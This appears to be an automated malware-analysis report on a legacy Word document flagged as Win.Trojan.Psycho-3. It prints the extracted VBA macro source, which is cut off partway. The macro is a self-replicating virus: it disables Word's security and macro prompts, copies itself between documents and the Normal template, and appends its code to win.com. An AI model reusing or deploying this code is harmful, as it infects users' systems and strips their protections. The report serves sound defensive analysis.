MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing a VBA macro with an AutoClose subroutine, which is a common technique for executing malicious code upon document opening. The ClamAV detection as 'Win.Trojan.Psycho-3' and the presence of an AutoClose macro strongly suggest malicious intent. The script attempts to construct a path to 'win.com' in the Windows directory, likely for dropping a secondary payload.
Heuristics 4
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5049 bytes |
SHA-256: b949ffc502c74925894e783e60bcf64a84b2ad4d833d1faadf6a33489fb4ca97 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "KRRPIPQP"
'module
Dim osdir As String
Dim casual As String
Dim TheString As String
Dim targdir As String
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Declare Function GetVersionExA Lib "kernel32" (lpVersionInformation As OSVERSIONINFO) As Integer
Private Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type
Sub AutoClose()
On Error Resume Next
Randomize
Dim sh, dh
sh = (0 * Rnd)
dh = (0 * Rnd)
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Options.VirusProtection = sh
Options.SaveNormalPrompt = dh
Application.EnableCancelKey = wCancelDisabled
Application.DisplayStatusBar = (Rnd * 0)
Application.ScreenUpdating = (Rnd * 0)
Application.DisplayAlerts = wdAlertsNone
CommandBars("Tools").Controls("Macro").Delete
Dim x
Dim count As Integer
count = 10
While count > 2
x = Int((85 - 100 + 1) * Rnd + 85)
y = Chr(x)
casual = casual + y
count = count - 1
Wend
Set Adoc = ActiveDocument.VBProject.VBComponents
Set NTmp = NormalTemplate.VBProject.VBComponents
osdir = GetWindows
Call getOS
Dim target As String
target = osdir & targdir & "win.com"
Call Verify(target)
Ego = "'module"
For i = 1 To NTmp.count
If NTmp(i).CodeModule _
.lines(1, 1) = Ego Then NtmpOK = True
Next i
For i = 1 To Adoc.count
If Adoc(i).CodeModule _
.lines(1, 1) = Ego Then DocOK = True
Next i
If DocOK = True And NtmpOK = False Then
For i = 1 To NTmp.count
Nam = NTmp(i).Name
Next i
With Application.NormalTemplate.VBProject
.VBComponents.Remove .VBComponents(Nam)
End With
Call FindAtts(target)
NTmp.Add 1
NTmp(2).Name = (casual)
NTmp(casual).CodeModule.AddFromString (TheString)
End If
If DocOK = False And NtmpOK = True Then
For i = 1 To Adoc.count
Nam = Adoc(i).Name
Next i
With Application.ActiveDocument.VBProject
.VBComponents.Remove .VBComponents(Nam)
End With
Call FindAtts(target)
Adoc.Add 1
Adoc(2).Name = (casual)
Adoc(casual).CodeModule.AddFromString (TheString)
End If
End Sub
Public Function GetWindows() As String
Dim v As String
Dim y As Long
v = String$(144, 0)
y = GetWindowsDirectory(v, Len(v))
If y = 0 Then
GetWindows = 0
Else
GetWindows = Left(v, y)
End If
End Function
Public Function Attach(D$)
errnum = 1: Open D$ For Binary As 1
If Err Then GoTo Jumpit
errnum = 0
Seek #1, LOF(1) + 1
mystr$ = ThisDocument.VBProject.VBComponents(2).CodeModule.lines(1, 167)
Put #1, , Chr(42) + Chr(95) + Chr(95) + Chr(42) & mystr$ & Chr(42) + Chr(95) + Chr(95) + Chr(42)
Jumpit:
Close
Attach = errnum
End Function
Public Function Verify(target As String)
Dim TheString As String
Dim f As Long
Dim tmpcounter As Integer
tmpcounter = 0: f = 1
Open target For Binary As #1
TheString = String$(LOF(1), 0)
Get #1, 1, TheString
s = InStr(f, TheString, (Chr(42) + Chr(95) + Chr(95) + Chr(42)))
Close #1
If s Then
Close
Else:
Call Attach(target)
End If
End Function
Public Function FindAtts(target As String)
Dim St As Long
Dim fi As Long
Dim Siz As Long
Dim f As Long
Dim addition As String
Dim tmpcounter As Integer
tmpcounter = 0: f = 1
Open target For Binary As #1
TheString = String$(LOF(1), 0)
Get #1, 1, TheString
s = InStr(f, TheString, (Chr(42) + Chr(95) + Chr(95) + Chr(42)))
f = InStr(s + 1, TheString, (Chr(42) + Chr(95) + Chr(95) + Chr(42)))
If s And f Then
St = s + 4
fi = f
Siz
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.